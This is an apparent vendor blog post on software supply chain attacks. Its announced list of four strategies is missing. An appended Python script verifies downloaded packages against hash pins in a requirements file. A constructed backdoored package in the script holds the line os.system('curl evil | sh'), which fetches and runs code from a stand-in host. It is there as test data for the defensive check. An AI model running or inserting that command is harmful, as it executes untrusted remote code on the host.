The software supply chain is a vast, global landscape made up of a complicated web of interconnected software producers and consumers. As such, it comes with numerous risks and vulnerabilities that affect all software, including software from third parties and outside vendors. These risks range from vulnerable code and compromised open-source repositories to hijacked software updates, insecure connected devices, overprivileged access to resources across the supply chain, and more.

Many software supply chain vulnerabilities arise because most software is not written from scratch. Instead, developers rely on open-source code to scale software production. As many as 96% of applications contain at least one open-source component, and 78% of businesses report using open-source software as part of their network. While this trend is integral to advancing business productivity, it also highlights the importance of creating a secure software supply chain.

Read on to learn what steps your developers can take to better secure software production and consumption throughout the software development lifecycle (SDLC).

How software supply chain attacks are shifting left

Supply chain attacks typically involve multiple components and can evolve rapidly depending on the attack vector or entry point used. Attackers usually start with an initial compromise of one upstream link in the chain in order to eventually reach a downstream consumer.

For example, a threat group might start a software supply chain attack by compromising a popular open-source component. As developers around the world pull in the new release, they unknowingly ingest a malicious or backdoored package. The attackers then use that foothold to gain privileged, persistent access to the victim's network. From there, they can steal data or money, monitor activity within the network, disable critical systems, and more.

We are also seeing a growing trend in which attackers shift left, moving their point of compromise earlier in the SDLC. Software supply chain attacks increasingly target developers and the systems they use, such as build and release infrastructure, because a single compromise there propagates into every downstream build. This approach can be seen in past incidents like Solorigate and 3CX.

So, what can organizations do to guard against this shift left and secure their software supply chain moving forward?

4 strategies for more secure software supply chains

As attackers continue shifting left, your organization and the software that supports it must do the same. Building security into the SDLC from the start, covering both how software is produced and how third-party software is consumed, helps organizations shift left, increasing security and limiting the risk of compromise. Following are four strategies you can use to create a more secure SDLC.

While the software supply chain can be difficult to navigate and complex to secure, businesses can partner with leading security organizations to implement best practices and holistically safeguard their environment.

For more information on Microsoft's work to secure the software supply chain, visit the Microsoft Built-In Security website.
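One concrete check on the consumption side of the backdoored-package scenario described above, added here as an example that is not code from the original post or from Microsoft: every third-party artifact a build fetches is compared against a version and SHA-256 digest pinned in a reviewed requirements file before it is installed, so a release that was republished upstream with the same version number but different bytes fails the build instead of landing in production. The package names, file contents and digests are constructed for the demonstration; the requirements syntax is pip's --hash pinning format.

```python
"""Added example, not code from the original post or from Microsoft.

A minimal "safe consumption" check: each fetched artifact is classified
against the version and SHA-256 pinned for it, and anything that is not
an exact match fails the build. Names, bytes and digests are constructed.
"""
import hashlib
import re


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed artifacts standing in for wheels fetched from a package index.
EXAMPLE_PKG_GENUINE = b"PK\x03\x04 example_pkg-1.2.0 genuine build contents"
OTHER_LIB_GENUINE = b"PK\x03\x04 other_lib-3.0.1 genuine build contents"
# The same release republished with an injected payload: the typical upstream
# compromise, where the version number does not change but the bytes do.
OTHER_LIB_BACKDOORED = OTHER_LIB_GENUINE + b"\nimport os; os.system('curl evil | sh')"

# Constructed pip-style requirements: two packages pinned by exact version and
# SHA-256 (digests of the genuine builds), and one pinned by neither.
SAMPLE_REQUIREMENTS = f"""
# generated by the release engineer and reviewed in a pull request
example-pkg==1.2.0 --hash=sha256:{sha256_hex(EXAMPLE_PKG_GENUINE)}
other-lib==3.0.1 --hash=sha256:{sha256_hex(OTHER_LIB_GENUINE)}
unpinned-tool>=0.9
"""

REQ_LINE = re.compile(
    r"^(?P<name>[A-Za-z0-9_.-]+)\s*(?P<op>==|~=|>=|<=|>|<)?\s*(?P<version>\S+)?(?P<rest>.*)$"
)
HASH_OPT = re.compile(r"--hash=sha256:([0-9a-fA-F]{64})")


def parse_requirements(text: str) -> dict:
    """Map package name -> {"version": exact pin or None, "hashes": set of sha256}."""
    pins = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        m = REQ_LINE.match(line)
        if not m:
            raise ValueError(f"unparseable requirement: {line!r}")
        pins[m["name"].lower()] = {
            "version": m["version"] if m["op"] == "==" else None,
            "hashes": {h.lower() for h in HASH_OPT.findall(m["rest"])},
        }
    return pins


def verify_artifact(name: str, version: str, data: bytes, pins: dict) -> str:
    """Classify one fetched artifact; any verdict other than "ok" fails the build."""
    pin = pins.get(name.lower())
    if pin is None:
        return "not-in-requirements"  # transitive or sneaked-in dependency
    if pin["version"] is None:
        return "unpinned-version"     # a range lets the index choose for us
    if pin["version"] != version:
        return "version-mismatch"
    if not pin["hashes"]:
        return "no-hash-pin"          # a version alone does not bind the bytes
    if sha256_hex(data) in pin["hashes"]:
        return "ok"
    return "hash-mismatch"            # same version, different bytes: tampered


def audit(requirements_text: str, fetched: dict) -> dict:
    """fetched: {name: (version, bytes)} -> {name: verdict}, including pins never fetched."""
    pins = parse_requirements(requirements_text)
    verdicts = {name.lower(): verify_artifact(name, ver, data, pins)
                for name, (ver, data) in fetched.items()}
    for name in pins:
        verdicts.setdefault(name, "not-fetched")
    return verdicts


def failures(verdicts: dict) -> list:
    """Names whose artifact must not be installed, sorted for stable reporting."""
    return sorted(n for n, v in verdicts.items() if v != "ok")


# Constructed download set: the genuine example-pkg, the backdoored other-lib
# served under the pinned version, and a tool nobody pinned.
FETCHED = {
    "example-pkg": ("1.2.0", EXAMPLE_PKG_GENUINE),
    "other-lib": ("3.0.1", OTHER_LIB_BACKDOORED),
    "unpinned-tool": ("0.9.3", b"whatever the index served today"),
}

if __name__ == "__main__":
    results = audit(SAMPLE_REQUIREMENTS, FETCHED)
    for name, verdict in sorted(results.items()):
        print(f"{name:15} {verdict}")
    raise SystemExit(1 if failures(results) else 0)
```

Run as a build step, the script exits non-zero when any artifact is unpinned, missing, or differs from the pinned digest; the hash, not the version string, is what ties the consumed bytes to the reviewed pin, which is why the backdoored other-lib is rejected even though its version matches.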